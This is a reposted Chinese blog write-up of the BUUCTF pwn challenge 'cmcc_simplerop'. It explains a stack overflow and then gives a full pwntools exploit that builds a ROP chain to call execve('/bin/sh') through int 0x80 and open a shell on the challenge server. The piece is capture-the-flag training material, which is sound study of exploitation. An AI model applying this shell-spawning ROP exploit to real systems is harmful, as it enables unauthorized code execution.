當(dāng)前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

[BUUCTF-pwn]——cmcc_simplerop (ropchain)

發(fā)布時間：2024/4/17 编程问答 20 豆豆

生活随笔收集整理的這篇文章主要介紹了 [BUUCTF-pwn]——cmcc_simplerop (ropchain) 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

[BUUCTF-pwn]——cmcc_simplerop

有棧溢出，自己找rop鏈，最簡單的方法，讓ROPgadget幫我們弄好呀，可是有點長，所有需要我們修改。畢竟有長度要求。因為“/bin/sh"字符串沒有找到，所有這之前的都不動，下面的pop eax; pop ebx; pop ecx; pop edx除了pop ebx 注意下，其他都可以進(jìn)行修改 inc就是 ++

exploit

目的：使得excve("/bin/sh") eax = 0xb; ebx ->"/bin/sh"; ecx = 0; edx = 0

from pwn import * from struct import packcontext(os='linux',arch='i386',log_level='debug')#sh = process('./simplerop') sh = remote("node3.buuoj.cn",28712)strcmp_got = 0x080EA038 pop_eax = 0x080bae06 pop_edx_ecx_ebx = 0x0806e850 p = 'A' * 32p += pack('<I', 0x0806e82a) # pop edx ; ret p += pack('<I', 0x080ea060) # @ .data p += pack('<I', 0x080bae06) # pop eax ; ret p += '/bin' p += pack('<I', 0x0809a15d) # mov dword ptr [edx], eax ; ret p += pack('<I', 0x0806e82a) # pop edx ; ret p += pack('<I', 0x080ea064) # @ .data + 4 p += pack('<I', 0x080bae06) # pop eax ; ret p += '//sh' p += pack('<I', 0x0809a15d) # mov dword ptr [edx], eax ; ret p += pack('<I', 0x0806e850) # pop edx ecx ebx p += p32(0) + p32(0) p += pack('<I', 0x080ea060) # padding without overwrite ebxp += pack('<I', 0x080bae06) # pop eax ; ret p += p32(0xb) p += pack('<I', 0x080493e1) # int 0x80payload = p sh.sendafter('Your input :',payload) sh.interactive()

總結(jié)

以上是生活随笔為你收集整理的[BUUCTF-pwn]——cmcc_simplerop (ropchain)的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。

上一篇： [BUUCTF-pwn]——picoct
下一篇： [BUUCTF-pwn]——pwnabl